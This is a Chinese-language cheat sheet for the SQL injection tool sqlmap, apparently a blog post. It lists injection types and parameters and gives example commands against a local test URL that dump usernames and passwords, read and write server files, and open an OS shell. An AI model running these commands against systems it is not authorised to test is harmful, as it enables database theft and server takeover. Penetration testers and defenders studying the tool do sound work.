SQL注入神器——sqlmap的常用参数、方法总结
简介
Sqlmap是一款开源的自动化SQL注入工具,是集获取数据库信息、获取主机权限、读写文件和提权等功能于一身的强大注入工具。
支持的数据库
MySQL
Oracle
PostgreSQL
Microsoft SQL Server
Microsoft Access
IBM DB2
SQLite
Firebird
Sybase
SAP MaxDB
支持的注入模式
布尔的盲注——根据返回页面判断条件真假的注入
时间的盲注——用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断
报错注入——把注入的语句的结果直接返回在错误信息页面中
联合查询注入——可以使用union的情况下的注入;
堆查询注入——可以同时执行多条语句的执行时的注入。
常用参数
获取数据库信息:
-u 指定目标URL
–dbs 列出所有的数据库
–dbms 指定数据库类型
–users 列出数据库管理系统用户
–current-db 列出当前数据库
-D 选择使用哪个数据库
-T 选择使用哪个表
-C 选择使用哪个列
–tables 列出当前的表
–columns 列出当前的列
–dump 获取字段中的数据
–banner 检索 banner
基本设置:
-d 连接数据库
–cookie 添加cookie认证(当程序有防get注入的时候,可以使用cookie注入)
–user-agent 使用特定的浏览器用户代理
–os-shell 获取主机shell
–thread 设置多线程(默认为3,最大为10)
–tamper 调用脚本进行注入
–delay 设置多久访问一次
-timeout 设定超时时间
-level 设置注入探测等级(1-5,默认1; 级别越高,检测越全面)
-v 指定sqlmap的回显等级(0-6,默认1)【“0”只显示python错误以及严重的信息;1同时显示基本信息和警告信息(默认);“2”同时显示debug信息;“3”同时显示注入的payload;“4”同时显示HTTP请求;“5”同时显示HTTP响应头;“6”同时显示HTTP响应页面】
读写文件:
–file-read 读取文件(后面接本地要访问的目标文件)
–file-write 写入文件(后面接本地要写入的文件)
–file-dest 写入文件的绝对路径(后面接要写入目标主机的路径)
读写文件Payload:
读取Linux服务器的文件:
sqlmap.py -u "http://127.0.0.1/user.php?id=0" --file-read=/etc/1.txt
读取Windows服务器的文件:
sqlmap.py -u "http://127.0.0.1/user.php?id=0" --file-read=D:/1.txt
写入本地文件到服务器上:
sqlmap.py -u "http://127.0.0.1/user.php?id=0" --file-write /test/1.txt --file-dest /var/www/html/1.txt
实战payload
测试URL是否存在注入:
sqlmap.py -u "http://127.0.0.1/user.php?id=0"
列出数据库用户:
sqlmap.py -u "http://127.0.0.1/user.php?id=0" --users
列出数据库所有库名:
sqlmap.py -u "http://127.0.0.1/user.php?id=0" --dbs
查看当前数据库:
sqlmap.py -u "http://127.0.0.1/user.php?id=0" --current-db
查看数据库security中的表:
sqlmap.py -u "http://127.0.0.1/user.php?id=0" -D security --tables
查看表users中的字段:
sqlmap.py -u "http://127.0.0.1/user.php?id=0" -D security -T users --columns
查看字段password,username的内容:
sqlmap.py -u "http://127.0.0.1/user.php?id=0" -D security -T users -C "password,username" --dump
拿下服务器shell:
sqlmap.py -u "http://127.0.0.1/user.php?id=0" –os-shell